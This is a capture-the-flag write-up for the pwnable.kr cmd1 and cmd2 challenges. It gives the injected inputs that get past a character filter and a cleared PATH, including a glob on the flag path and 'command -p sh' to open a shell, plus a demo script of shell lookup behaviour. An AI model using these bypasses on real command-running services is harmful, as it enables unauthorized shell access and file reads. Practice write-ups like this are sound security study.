cmd challenges in Pwnable.kr
Jul 27, 2019
In this post we solve a few easy challenges on pwnable.kr called cmd1 and cmd2.
cmd1 and cmd2
These two challenges required us to circumvent a cleared PATH environment variable.
cmd1
In the first challenge, the program has a small filter that doesn't include /.
Bypassing this filter is rather easy with sh's * expansion and a full path to the executable we wish to use.
./cmd1 "/bin/cat /home/cmd1/fl*"
cmd2
In the second challenge, the program has a larger filter and clears all environment variables.
This makes us unable to use the solution from the first challenge, as that solution uses / in the program name.
However, sh has a built-in called command (see the bash man page), which takes a -p parameter that uses a default setting for the PATH variable. Now we can execute
./cmd2 "command -p sh"
and pop a shell; from here we can cat the flag.
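The lookup behaviour both solutions rely on, as an added example that is not part of the original post or the challenge source: a child sh is started with an empty environment and a bogus PATH, and three ways of naming cat are compared. BOGUS_PATH and the function names are constructed for this illustration, and /dev/null stands in for the file being read.

```shell
#!/bin/sh
# Constructed stand-in for the bogus PATH value; not the challenge's own.
BOGUS_PATH=/nonexistent-dir

# Run the command string "$1" in a child sh whose environment holds only
# the bogus PATH, and print the child's exit status (127 = not found).
scrubbed_status() {
    status=0
    env -i PATH="$BOGUS_PATH" /bin/sh -c "$1" >/dev/null 2>&1 || status=$?
    echo "$status"
}

# Print one line per lookup style so the three cases can be compared:
#   plain name      -> searched in PATH, so the bogus PATH blocks it
#   absolute path   -> never consults PATH (the cmd1 approach)
#   command -p name -> searched in the shell's default PATH (the cmd2 approach)
report() {
    for cmd in 'cat /dev/null' '/bin/cat /dev/null' 'command -p cat /dev/null'
    do
        printf '%-28s -> exit %s\n' "$cmd" "$(scrubbed_status "$cmd")"
    done
}

report
```

Only the plain name fails, which is why overwriting PATH or wiping the environment does not confine input that is still handed to a shell.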